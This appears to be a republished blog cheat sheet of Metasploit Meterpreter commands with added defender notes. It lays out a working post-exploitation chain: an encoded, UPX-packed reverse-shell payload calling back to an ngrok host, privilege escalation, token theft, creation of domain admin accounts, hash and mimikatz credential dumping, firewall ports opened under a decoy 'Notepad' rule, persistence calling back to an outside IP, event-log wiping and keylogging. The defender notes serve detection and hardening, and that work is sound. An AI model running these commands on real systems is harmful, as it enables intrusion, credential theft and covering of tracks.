meterpreter Command Sample

meterpreter Command Sample

==================================================================================================
# Payload generation (run in an OS shell, not inside msfconsole).
# Both msfvenom lines build the same staged windows/meterpreter/reverse_tcp
# payload, passed through the x86/shikata_ga_nai encoder 12 times (-e / -i)
# with a bad-character list (-b). The first prints it as a C array (-f c).
# The callback target is free.ngrok.cc:10678, while the handler further down
# listens on 192.168.195.45:10678 -- presumably a tunnel forwards between the
# two; the tunnel setup is not shown on this page.
# Defender note: encoder passes and packing only change the file's static
# appearance. The stage download, in-memory loading and the outbound
# connection are unchanged, so behavioural EDR rules and egress filtering or
# alerting on tunnelling-service hostnames still apply.
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 12 -b 'x00' LHOST=free.ngrok.cc LPORT=10678 -f c

# Same payload, written as a Windows executable to qq.exe (-f exe -o).
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 12 -b 'x00' LHOST=free.ngrok.cc LPORT=10678 -f exe -o qq.exe
# Pack qq.exe with UPX at compression level 5; -k keeps a backup of the
# unpacked file.
upx -5 qq.exe -k
==================================================================================================
# Listener side: exploit/multi/handler waits for the payload generated above
# to connect back. The payload type and port match the msfvenom lines.
msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.195.45
set lport 10678
# Keep the listener running after the first session opens.
set ExitOnSession false
# Run the smart_migrate post module automatically on every new session; it
# moves the Meterpreter code into another process.
# Defender note: this is cross-process injection. EDR products and Sysmon
# (Event ID 10 ProcessAccess, Event ID 8 CreateRemoteThread) record it with
# the initial payload process as the source.
set AutorunScript post/windows/manage/smart_migrate
# -j runs the handler as a background job, -z does not interact with the
# session when it opens; jobs lists the running jobs.
exploit -j -z
jobs

# Attach to session 1 and collect basic host information, a desktop
# screenshot and the account the session runs as.
sessions -i 1
sysinfo
screenshot
getuid
# getsystem attempts local elevation to NT AUTHORITY\SYSTEM; the second
# getuid confirms whether it worked.
# Defender note: getsystem's named-pipe impersonation techniques register a
# short-lived service, which shows up as Event ID 7045 (service installed) in
# the System log; they also require the session to already hold
# administrative rights, so least-privilege user accounts limit this step.
getsystem
getuid
# Privilege-based process migration (a further cross-process injection).
run post/windows/manage/priv_migrate
# Return to the msfconsole prompt, leaving the session open.
background

# Token theft: list processes, impersonate the access token of the process
# given by PID (a placeholder on this page), then drop it again.
# getuid shows the identity currently in effect.
# Defender note: only tokens of accounts with a process on the host can be
# taken, so keeping privileged (especially domain admin) logons off
# workstations and member servers is the main mitigation.
ps
steal_token PID
drop_token
getuid

# incognito extension: enumerate the user (-u) and group (-g) tokens that are
# present on the host and impersonate one of them. DOMAIN_NAMEUSERNAME is a
# placeholder.
use incognito
help incognito
list_tokens -u
list_tokens -g
impersonate_token DOMAIN_NAMEUSERNAME
# Using the impersonated identity, create an account on the host given with
# -h (presumably a domain controller) and add it to "Domain Admins".
# Defender note: on domain controllers this produces Security Event ID 4720
# (user account created) and 4728 (member added to a security-enabled global
# group). Any change to Domain Admins membership should raise an alert.
add_user domainuser password -h 192.168.195.191
add_group_user "Domain Admins" domainuser -h 192.168.195.191

# Dump the password hashes stored on the host (needs SYSTEM-level access).
# Defender note: NT hashes are unsalted, which is why precomputed-table
# lookups such as the Ophcrack service linked below work against short
# passwords. Disabling LM hash storage, long passphrases and unique local
# administrator passwords per host (e.g. LAPS) limit what a dump yields.
run post/windows/gather/smart_hashdump
# http://www.objectif-securite.ch/en/ophcrack.php

# Legacy mimikatz extension. msv, ssp, kerberos and wdigest each read the
# credentials cached by that authentication package in LSASS memory; the
# two mimikatz_command lines call mimikatz functions directly (SAM hash dump,
# password search in LSASS).
# Defender note: all of these need read access to lsass.exe. Relevant
# controls are LSA protection (RunAsPPL), Credential Guard, disabling WDigest
# plaintext caching (UseLogonCredential = 0) and alerting on process-access
# events that target lsass.exe (Sysmon Event ID 10).
use mimikatz
help mimikatz
msv
ssp
kerberos
wdigest
mimikatz_command -f samdump::hashes
mimikatz_command -f sekurlsa::searchPasswords

# Host reconnaissance: check whether the target is a virtual machine, list
# installed applications, and parse the .lnk shortcuts of recently used files.
run post/windows/gather/checkvm
run post/windows/gather/enum_applications
run post/windows/gather/dumplinks

# Hardware reconnaissance: history of attached USB storage devices and the
# list of installed hardware devices.
run post/windows/gather/usb_history
run post/windows/gather/enum_devices

# Open an interactive (-i), hidden (-H) cmd.exe that runs with the current
# thread token (-t). The lines up to exit are typed into that cmd.exe, not
# into Meterpreter: they create a local account and add it to Administrators,
# create a domain account and add it to "Domain Admins", and open TCP ports
# 10678 and 19655 in the Windows firewall under the rule name "Notepad".
# Defender note: account creation and group changes log Security Event IDs
# 4720, 4732 (local group) and 4728 (global group); with command-line
# auditing enabled, Event ID 4688 also records the password typed on the
# net user line. The firewall change logs Event ID 4946 when policy-change
# auditing is on. The rule name is only a label, so review rules by port and
# program rather than by name. netsh firewall is the legacy context that
# netsh advfirewall replaced.
execute -f cmd.exe -i -H -t
net user username userpass /add
net localgroup "Administrators" username /add
net user domainuser userpass /add /DOMAIN
net group "Domain Admins" domainuser /add /DOMAIN
netsh firewall add portopening TCP 10678 "Notepad" ENABLE ALL
netsh firewall add portopening TCP 19655 "Notepad" ENABLE ALL
exit

# Persistence, using two legacy Meterpreter scripts.
# metsvc installs Meterpreter as a Windows service. persistence installs an
# agent that starts at boot (-X) and tries to connect to 47.90.92.56 on port
# 10678 (-r / -p) every 10 seconds (-i).
# Defender note: the service install logs Event ID 7045 (System log) and 4697
# (Security log, when audited). The boot-time agent relies on an autorun
# entry, so autorun inventories and registry-change monitoring (Sysmon Event
# ID 13) expose it, and the fixed-interval outbound retries to one address
# stand out in network logs.
run metsvc
run persistence -X -i 10 -p 10678 -r 47.90.92.56

# Remote Desktop access: the post module and the legacy getgui script both
# enable RDP (-e); getgui -u / -p additionally creates the given account for
# RDP logon. The rdesktop line below is the client-side command, run from
# the operator's own machine.
# Defender note: watch for changes to the fDenyTSConnections registry value,
# for new accounts (Event ID 4720), and for logon type 10
# (RemoteInteractive) in Event ID 4624 on hosts where RDP is not expected.
run post/windows/manage/enable_rdp
run getgui -e
run getgui -u username -p userpass
# rdesktop -u username -p userpass server[:port]

# clearev wipes the Application, System and Security event logs on the host.
# Defender note: the wipe is itself logged -- Event ID 1102 (Security log
# cleared) and Event ID 104 (System log cleared) -- and does not touch events
# already forwarded to a central collector, so ship logs off-host in near
# real time and alert on both IDs.
clearev
# Start recording the logged-on user's keystrokes.
run post/windows/capture/keylog_recorder
==================================================================================================
原文地址:https://www.cnblogs.com/lsgxeva/p/8456184.html